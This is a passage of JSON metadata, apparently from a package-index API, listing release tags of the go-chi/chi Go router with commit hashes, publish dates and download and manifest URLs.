","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.